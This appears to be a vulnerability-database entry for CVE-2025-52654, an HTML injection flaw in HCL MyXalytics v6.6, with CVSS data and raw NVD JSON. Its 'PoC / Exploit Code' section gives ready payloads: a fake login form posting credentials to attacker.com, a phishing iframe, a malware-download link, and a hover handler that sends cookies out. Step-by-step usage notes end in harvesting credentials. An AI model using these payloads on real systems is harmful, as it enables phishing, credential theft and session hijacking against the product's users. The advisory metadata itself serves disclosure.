Security Vulnerability Report
CVE-2025-52654 CVSS 4.6 MEDIUM

CVE-2025-52654

Published: 2025-10-03 19:15:46
Last Modified: 2025-10-10 14:15:43

Description

HCL MyXalytics v6.6 is affected by an HTML Injection. This issue occurs when untrusted input is included in the output without proper handling, potentially allowing unauthorized content injection and manipulation.

CVSS Details

CVSS Score: 4.6
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:hcltech:dryice_myxalytics:6.6:*:*:*:*:*:*:* - VULNERABLE
HCL MyXalytics v6.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- CVE-2025-52654 - HCL MyXalytics HTML Injection PoC -->
<!-- This PoC demonstrates HTML injection in vulnerable input fields -->

<!-- Example 1: Injecting a fake login form for phishing -->
<div style="border: 1px solid #ccc; padding: 20px; background: #f9f9f9;">
  <h3>Session Expired - Please Re-authenticate</h3>
  <form action="https://attacker.com/steal-credentials" method="POST">
    <label>Username: <input type="text" name="username"></label><br>
    <label>Password: <input type="password" name="password"></label><br>
    <input type="submit" value="Login">
  </form>
</div>

<!-- Example 2: Injecting an iframe to overlay malicious content -->
<iframe src="https://attacker.com/phishing-page" width="800" height="600" style="border:none;"></iframe>

<!-- Example 3: Injecting a hidden image for tracking/CSRF -->
<img src="https://attacker.com/track?user=victim_id" width="1" height="1" style="display:none;">

<!-- Example 4: Injecting a malicious redirect link -->
<a href="https://attacker.com/malware-download" style="color:red;font-size:24px;">
  Click here for important security update!
</a>

<!-- Example 5: Injecting a fake error message with credential harvesting -->
<script>// Note: Pure HTML injection may not execute scripts, but can be combined with other vulns</script>
<div onmouseover="document.location='https://attacker.com/log?cookie='+document.cookie">
  Hover here for details
</div>

<!-- Usage:
1. Authenticate to HCL MyXalytics v6.6 with low-privilege credentials
2. Navigate to the vulnerable input field (e.g., report description, dashboard title)
3. Paste one of the above HTML payloads
4. When another user views the content, the injected HTML will be rendered
5. Harvest credentials or perform further attacks via the injected elements
-->
```

References

https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124411 (Vendor Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-52654",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-03T19:15:46.487",
    "lastModified": "2025-10-10T14:15:42.840",
    "vulnStatus": "Modified",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "HCL MyXalytics v6.6 is affected by an HTML Injection. This issue occurs when untrusted input is included in the output without proper handling, potentially allowing unauthorized content injection and manipulation."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N",
            "baseScore": 4.6,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.1,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-80"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:hcltech:dryice_myxalytics:6.6:*:*:*:*:*:*:*",
                "matchCriteriaId": "63206848-DCF7-4835-A58C-5F3E7F455E5C"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124411",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```